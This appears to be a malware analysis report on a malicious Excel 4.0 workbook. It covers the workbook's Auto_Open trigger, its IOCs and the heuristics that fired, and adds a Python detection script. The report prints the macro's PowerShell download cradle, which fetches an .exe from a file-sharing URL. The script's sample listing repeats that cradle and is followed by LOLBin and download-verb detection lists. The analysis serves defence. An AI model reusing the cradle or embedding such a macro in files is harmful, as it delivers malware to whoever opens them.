Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 db76aa51b4d93056…

MALICIOUS

Office (OLE) / .XLS

Size: 535.5 KB
Created: 2021-07-29 19:03:34
Authoring application: Microsoft Excel
First seen: 2022-07-22
MD5: 8a1f364a38b312c113f129abb3864a3e
SHA-1: f35cc7787821689bbdd16a38e9a5cd6c3608dd91
SHA-256: db76aa51b4d93056d14c223ea06b0184dee71bd1feff3035007c5b240c4470c1
Risk Score: 162

Malware Insights

MITRE ATT&CK
  • T1059.001 Command and Scripting Interpreter: PowerShell
  • T1204.002 User Execution: Malicious File

The workbook defines an Excel 4.0 (XLM) Auto_Open name, so Excel evaluates the macro sheet as soon as the file is opened with macros enabled; no click on a cell, button or shape is needed. The recovered macro references PowerShell and contains the sequence 'POWERshEll.ExE wGet https://' immediately followed by the extracted URL. In Windows PowerShell (the powershell.exe invoked here) wget is a built-in alias for Invoke-WebRequest, so this is a download cradle that fetches a secondary payload (the URL path ends in an .exe filename) from the referenced host. The mixed-case spelling of the executable name is a common attempt to slip past case-sensitive string signatures; Windows resolves the name case-insensitively, so it costs the attacker nothing. The URL is listed as an IOC because the macro's logic references it explicitly, not because of any reputation verdict on the URL itself (see the per-URL channel label under Embedded URL).

Heuristics (5)

  • Excel 4.0 Auto_Open defined name [critical] OLE_XLM_AUTOOPEN_DEFINEDNAME
    oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. In the BIFF stream a built-in name such as Auto_Open is stored as a one-byte code rather than as the literal string, so the raw name record can be tokenized or partially opaque to byte-string checks; the recovered macro listing, however, confirms that the workbook has an XLM auto-execution entry.
  • Reference to PowerShell [high] SC_STR_POWERSHELL
    The document's strings reference PowerShell.
  • LOLBin token sequence in document text [high] SE_LOLBIN_RUN_COMMAND
    Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, ...) within 220 characters of a dangerous flag, command verb, or URL. In HTML/PDF/RTF lure bodies this is a visible 'run this' instruction; in macro-laden Office files it is the macro's own string-pool entries appearing adjacent in the extracted text.
  • Excel 4.0 (XLM) macro sheet present [medium] OLE_XLM_AUTOOPEN
    The workbook contains an Excel 4.0 macro sheet sub-stream. XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: https://www72.zippyshare.com/d/CDE7qXWZ/27182/Fud.exe
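The text-level heuristics above (and the download-cradle reading in Malware Insights) can be reproduced outside the analysis platform. The block below is an added example, not the platform's or oletools' own code: it re-implements the XLM auto-exec name check, the case-insensitive LOLBin/trigger proximity rule with its 220-character window, and the URL extraction in plain Python, then runs them over a constructed macro listing shaped loosely like an olevba XLM dump. The EXEC() wrapper and cell layout of that listing, the LOLBin and trigger word lists, and all function names are assumptions; only the quoted command fragment and the URL come from the report.

```python
"""Added example (not the analysis platform's code): a pure-Python
re-implementation of the text-level heuristics in the report, run over a
CONSTRUCTED macro listing shaped like an olevba XLM dump.  Needs no oletools
and never touches the network."""
import re

# LOLBins that execute whatever command line they are handed (assumed list).
LOLBINS = ("powershell", "pwsh", "mshta", "cmd", "rundll32", "regsvr32",
           "wscript", "cscript", "certutil", "bitsadmin")
LOLBIN_RE = re.compile(r"\b(" + "|".join(LOLBINS) + r")(?:\.exe)?\b", re.I)

# Anything that, next to a LOLBin, turns a bare name into a "run this"
# instruction: download/exec verbs (wget/curl/iwr are Windows PowerShell
# aliases), evasion flags, or a URL.  Matching is case-insensitive on purpose:
# Windows resolves POWERshEll.ExE exactly like powershell.exe.
URL_RE = re.compile(r"https?://[^\s\"'<>)]+", re.I)
TRIGGER_RE = re.compile(
    r"\b(?:wget|curl|iwr|irm|iex|invoke-webrequest|invoke-expression|"
    r"downloadstring|downloadfile|start-process|urlcache)\b"
    r"|(?<!\S)-(?:enc|encodedcommand|nop|noprofile|ep|executionpolicy|w|windowstyle)\b"
    r"|" + URL_RE.pattern,
    re.I,
)

# XLM names Excel evaluates by itself (no click needed).  In the BIFF file the
# built-in name is a one-byte code, which is why this check runs on the
# *recovered* listing rather than on the raw bytes.
AUTOEXEC_RE = re.compile(r"\b(auto_open|auto_close|auto_activate)\b", re.I)


def xlm_autoexec_names(listing):
    """Auto-execution defined names present in a recovered XLM listing."""
    return sorted({m.group(1).lower() for m in AUTOEXEC_RE.finditer(listing)})


def extract_urls(text):
    """Every URL in the text, in order, without duplicates (the IOC list)."""
    return list(dict.fromkeys(URL_RE.findall(text)))


def find_lolbin_sequences(text, window=220):
    """(tool, trigger, gap) for each LOLBin name that has a dangerous flag,
    verb or URL within `window` characters of it.  gap is the number of
    characters between the two tokens (0 when adjacent or overlapping)."""
    hits = []
    triggers = list(TRIGGER_RE.finditer(text))
    for tool in LOLBIN_RE.finditer(text):
        for trig in triggers:
            gap = max(trig.start() - tool.end(), tool.start() - trig.end(), 0)
            if gap <= window:
                hits.append((tool.group(1).lower(), trig.group(0), gap))
    return hits


def heuristics(listing):
    """Fired heuristic IDs (named as in the report) mapped to their evidence."""
    fired = {}
    names = xlm_autoexec_names(listing)
    if names:
        fired["OLE_XLM_AUTOOPEN_DEFINEDNAME"] = names
    if "powershell" in listing.lower():
        fired["SC_STR_POWERSHELL"] = True
    seqs = find_lolbin_sequences(listing)
    if seqs:
        fired["SE_LOLBIN_RUN_COMMAND"] = seqs
    urls = extract_urls(listing)
    if urls:
        fired["EMBEDDED_URL"] = urls
    return fired


# Constructed input: NOT the sample's real macro listing.  Only the command
# fragment and the URL are taken from the report; EXEC() and the cell layout
# are assumptions.
SAMPLE_LISTING = """\
' Defined names:
'   Auto_Open = Macro1!$A$1
' Sheet: Macro1 (Excel 4.0 macro sheet)
A1: =EXEC("POWERshEll.ExE wGet https://www72.zippyshare.com/d/CDE7qXWZ/27182/Fud.exe")
A2: =HALT()
"""

if __name__ == "__main__":
    for hid, evidence in heuristics(SAMPLE_LISTING).items():
        print(hid, evidence)
```

Run as a script it prints the four IDs that fire on the constructed listing; in a real workflow the input is the macro listing olevba recovers from the workbook (the xlm_macros.txt artifact in the next section). Note that the proximity rule is deliberately permissive: a prose sentence such as "open PowerShell from the Start menu" yields no hit because nothing in the window is a verb, flag or URL, but a LOLBin name anywhere near a URL will fire, which is why the report ranks it below the Auto_Open evidence.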

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: xlm_macros.txt
SHA-256:  77526317693988808943c9b58a3ee3cfe53fc53006ec2ab7a604bb8c52dec5d0
Kind:     xlm-macro
Source:   oletools.olevba.extract_all_macros (XLM macro listing)
Size:     916 bytes